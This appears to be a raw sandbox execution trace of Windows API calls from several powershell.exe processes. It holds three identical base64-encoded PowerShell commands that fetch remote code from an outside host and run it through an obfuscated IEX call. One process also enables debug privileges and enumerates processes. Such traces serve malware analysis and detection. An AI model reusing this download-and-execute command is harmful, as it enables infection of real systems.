	[0955.426] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27fe00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0955.427] CoTaskMemFree (pv=0x27fe00) 
	[0955.428] CoTaskMemAlloc (cb=0x104) returned 0x27fe00
	[0955.428] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27fe00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0955.428] CoTaskMemFree (pv=0x27fe00) 
	[0955.428] CoTaskMemAlloc (cb=0x104) returned 0x27fe00
	[0955.428] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27fe00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0955.428] CoTaskMemFree (pv=0x27fe00) 
	[0956.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0956.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0956.629] CoTaskMemAlloc (cb=0x104) returned 0x27fe00
	[0956.629] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27fe00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0956.629] CoTaskMemFree (pv=0x27fe00) 
	[0956.630] CoTaskMemAlloc (cb=0x104) returned 0x27fe00
	[0956.630] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27fe00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0956.630] CoTaskMemFree (pv=0x27fe00) 
	[0956.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0956.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0967.852] CoTaskMemAlloc (cb=0x104) returned 0x280020
	[0967.852] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x280020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.852] CoTaskMemFree (pv=0x280020) 
	[0967.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0967.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0967.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0968.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x14d400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0968.187] SetErrorMode (uMode=0x1) returned 0x1
	[0968.187] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x14d680 | out: lpFileInformation=0x14d680*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0968.187] SetErrorMode (uMode=0x1) returned 0x1

Thread:
	id = 320
	os_tid = 0xf8c


Thread:
	id = 327
	os_tid = 0xfe0


Thread:
	id = 1352
	os_tid = 0x1eb0


Thread:
	id = 1355
	os_tid = 0x1ec4


Thread:
	id = 1446
	os_tid = 0x1828


Thread:
	id = 1545
	os_tid = 0x2074


Thread:
	id = 1631
	os_tid = 0x2230


Thread:
	id = 1651
	os_tid = 0x2290

	[0828.623] CoGetContextToken (in: pToken=0x1b5af430 | out: pToken=0x1b5af430) returned 0x0
	[0828.623] CObjectContext::QueryInterface () returned 0x0
	[0828.623] CObjectContext::GetCurrentThreadType () returned 0x0
	[0828.624] Release () returned 0x0
	[0828.624] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Process:
	id = "46"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x7a4a1000"
	os_pid = "0xdcc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 275
	os_tid = 0xdd0


Thread:
	id = 388
	os_tid = 0x35c


Thread:
	id = 389
	os_tid = 0xc28


Process:
	id = "47"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x791b3000"
	os_pid = "0xdec"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 277
	os_tid = 0xdf0


Thread:
	id = 418
	os_tid = 0x1074


Thread:
	id = 421
	os_tid = 0x1080


Thread:
	id = 2131
	os_tid = 0x2408


Thread:
	id = 2132
	os_tid = 0x244c


Thread:
	id = 2138
	os_tid = 0x24a0


Process:
	id = "48"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x775c0000"
	os_pid = "0xe18"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 284
	os_tid = 0xe1c

	[0456.217] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0458.292] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0458.292] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0458.292] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0458.292] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0462.506] GetVersionExW (in: lpVersionInformation=0x14dbc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14dbc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0462.508] GetVersionExW (in: lpVersionInformation=0x14dbc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14dbc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0462.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0462.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0462.523] GetVersionExW (in: lpVersionInformation=0x14d930*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14d930*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0462.524] SetErrorMode (uMode=0x1) returned 0x1
	[0462.525] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14da90 | out: lpFileInformation=0x14da90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0462.526] SetErrorMode (uMode=0x1) returned 0x1
	[0462.529] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14dd00 | out: lpdwHandle=0x14dd00) returned 0x94c
	[0463.029] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b572d8 | out: lpData=0x2b572d8) returned 1
	[0463.031] VerQueryValueW (in: pBlock=0x2b572d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14dc78, puLen=0x14dc70 | out: lplpBuffer=0x14dc78*=0x2b57374, puLen=0x14dc70) returned 1
	[0463.034] lstrlenW (lpString="䅁") returned 1
	[0463.043] VerQueryValueW (in: pBlock=0x2b572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14dbe8, puLen=0x14dbe0 | out: lplpBuffer=0x14dbe8*=0x2b57450, puLen=0x14dbe0) returned 1
	[0463.044] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0463.046] CoTaskMemAlloc (cb=0x2e) returned 0x3bc6d0
	[0463.046] lstrcpyW (in: lpString1=0x3bc6d0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0463.047] CoTaskMemFree (pv=0x3bc6d0) 
	[0463.047] VerQueryValueW (in: pBlock=0x2b572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14dbe8, puLen=0x14dbe0 | out: lplpBuffer=0x14dbe8*=0x2b574a4, puLen=0x14dbe0) returned 1
	[0463.047] lstrlenW (lpString="System.Management.Automation") returned 28
	[0463.047] CoTaskMemAlloc (cb=0x3c) returned 0x309860
	[0463.047] lstrcpyW (in: lpString1=0x309860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0463.047] CoTaskMemFree (pv=0x309860) 
	[0463.047] VerQueryValueW (in: pBlock=0x2b572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14dbe8, puLen=0x14dbe0 | out: lplpBuffer=0x14dbe8*=0x2b57500, puLen=0x14dbe0) returned 1
	[0463.047] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0463.047] CoTaskMemAlloc (cb=0x20) returned 0x3bb1b0
	[0463.048] lstrcpyW (in: lpString1=0x3bb1b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0463.048] CoTaskMemFree (pv=0x3bb1b0) 
	[0463.048] VerQueryValueW (in: pBlock=0x2b572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14dbe8, puLen=0x14dbe0 | out: lplpBuffer=0x14dbe8*=0x2b57540, puLen=0x14dbe0) returned 1
	[0463.048] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0463.048] CoTaskMemAlloc (cb=0x44) returned 0x309860
	[0463.048] lstrcpyW (in: lpString1=0x309860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0463.048] CoTaskMemFree (pv=0x309860) 
	[0463.048] VerQueryValueW (in: pBlock=0x2b572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14dbe8, puLen=0x14dbe0 | out: lplpBuffer=0x14dbe8*=0x2b575a8, puLen=0x14dbe0) returned 1
	[0463.048] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0463.048] CoTaskMemAlloc (cb=0x76) returned 0x36f330
	[0463.048] lstrcpyW (in: lpString1=0x36f330, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0463.048] CoTaskMemFree (pv=0x36f330) 
	[0463.048] VerQueryValueW (in: pBlock=0x2b572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14dbe8, puLen=0x14dbe0 | out: lplpBuffer=0x14dbe8*=0x2b57644, puLen=0x14dbe0) returned 1
	[0463.048] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0463.048] CoTaskMemAlloc (cb=0x44) returned 0x309860
	[0463.048] lstrcpyW (in: lpString1=0x309860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0463.048] CoTaskMemFree (pv=0x309860) 
	[0463.048] VerQueryValueW (in: pBlock=0x2b572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14dbe8, puLen=0x14dbe0 | out: lplpBuffer=0x14dbe8*=0x2b576a8, puLen=0x14dbe0) returned 1
	[0463.048] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0463.048] CoTaskMemAlloc (cb=0x58) returned 0x390df0
	[0463.048] lstrcpyW (in: lpString1=0x390df0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0463.048] CoTaskMemFree (pv=0x390df0) 
	[0463.048] VerQueryValueW (in: pBlock=0x2b572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14dbe8, puLen=0x14dbe0 | out: lplpBuffer=0x14dbe8*=0x2b57724, puLen=0x14dbe0) returned 1
	[0463.048] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0463.048] CoTaskMemAlloc (cb=0x20) returned 0x3bb1b0
	[0463.048] lstrcpyW (in: lpString1=0x3bb1b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0463.048] CoTaskMemFree (pv=0x3bb1b0) 
	[0463.048] VerQueryValueW (in: pBlock=0x2b572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14dbe8, puLen=0x14dbe0 | out: lplpBuffer=0x14dbe8*=0x2b573cc, puLen=0x14dbe0) returned 1
	[0463.048] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0463.049] CoTaskMemAlloc (cb=0x66) returned 0x34c4b0
	[0463.049] lstrcpyW (in: lpString1=0x34c4b0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0463.049] CoTaskMemFree (pv=0x34c4b0) 
	[0463.049] VerQueryValueW (in: pBlock=0x2b572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14dbe8, puLen=0x14dbe0 | out: lplpBuffer=0x14dbe8*=0x0, puLen=0x14dbe0) returned 0
	[0463.049] VerQueryValueW (in: pBlock=0x2b572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14dbe8, puLen=0x14dbe0 | out: lplpBuffer=0x14dbe8*=0x0, puLen=0x14dbe0) returned 0
	[0463.049] VerQueryValueW (in: pBlock=0x2b572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14dbe8, puLen=0x14dbe0 | out: lplpBuffer=0x14dbe8*=0x0, puLen=0x14dbe0) returned 0
	[0463.049] VerQueryValueW (in: pBlock=0x2b572d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14dbb8, puLen=0x14dbb0 | out: lplpBuffer=0x14dbb8*=0x2b57374, puLen=0x14dbb0) returned 1
	[0463.050] CoTaskMemAlloc (cb=0x204) returned 0x3c4300
	[0463.050] VerLanguageNameW (in: wLang=0x0, szLang=0x3c4300, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0463.051] CoTaskMemFree (pv=0x3c4300) 
	[0463.051] VerQueryValueW (in: pBlock=0x2b572d8, lpSubBlock="\\", lplpBuffer=0x14dc08, puLen=0x14dc00 | out: lplpBuffer=0x14dc08*=0x2b57300, puLen=0x14dc00) returned 1
	[0463.057] GetCurrentProcessId () returned 0xe18
	[0463.073] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x14cb30 | out: lpLuid=0x14cb30*(LowPart=0x14, HighPart=0)) returned 1
	[0463.483] GetCurrentProcess () returned 0xffffffffffffffff
	[0463.483] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x14cb50 | out: TokenHandle=0x14cb50*=0x2e0) returned 1
	[0463.484] AdjustTokenPrivileges (in: TokenHandle=0x2e0, DisableAllPrivileges=0, NewState=0x2b5ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0463.486] CloseHandle (hObject=0x2e0) returned 1
	[0463.489] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe18) returned 0x2e0
	[0463.499] EnumProcessModules (in: hProcess=0x2e0, lphModule=0x2b5abb8, cb=0x200, lpcbNeeded=0x14db68 | out: lphModule=0x2b5abb8, lpcbNeeded=0x14db68) returned 1
	[0463.502] GetModuleInformation (in: hProcess=0x2e0, hModule=0x13f370000, lpmodinfo=0x2b5ae28, cb=0x18 | out: lpmodinfo=0x2b5ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0463.503] CoTaskMemAlloc (cb=0x804) returned 0x3c4a30
	[0463.503] GetModuleBaseNameW (in: hProcess=0x2e0, hModule=0x13f370000, lpBaseName=0x3c4a30, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0463.503] CoTaskMemFree (pv=0x3c4a30) 
	[0463.504] CoTaskMemAlloc (cb=0x804) returned 0x3c4a30
	[0463.504] GetModuleFileNameExW (in: hProcess=0x2e0, hModule=0x13f370000, lpFilename=0x3c4a30, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0463.504] CoTaskMemFree (pv=0x3c4a30) 
	[0463.505] CloseHandle (hObject=0x2e0) returned 1
	[0463.513] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xe18) returned 0x2e0
	[0463.514] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x14dc98 | out: lpExitCode=0x14dc98*=0x103) returned 1
	[0463.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b5b088, Length=0x20000, ResultLength=0x14dc60 | out: SystemInformation=0x12b5b088, ResultLength=0x14dc60*=0x2bf90) returned 0xc0000004
	[0463.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b7b0b8, Length=0x2e790, ResultLength=0x14dc60 | out: SystemInformation=0x12b7b0b8, ResultLength=0x14dc60*=0x2bf90) returned 0x0
	[0464.706] EnumWindows (lpEnumFunc=0x29e66ac, lParam=0x0) returned 1
	[0464.707] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.707] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x558
	[0464.707] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.707] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.707] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.707] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x538
	[0464.707] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.707] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x778
	[0464.707] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x778
	[0464.707] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.708] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.708] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
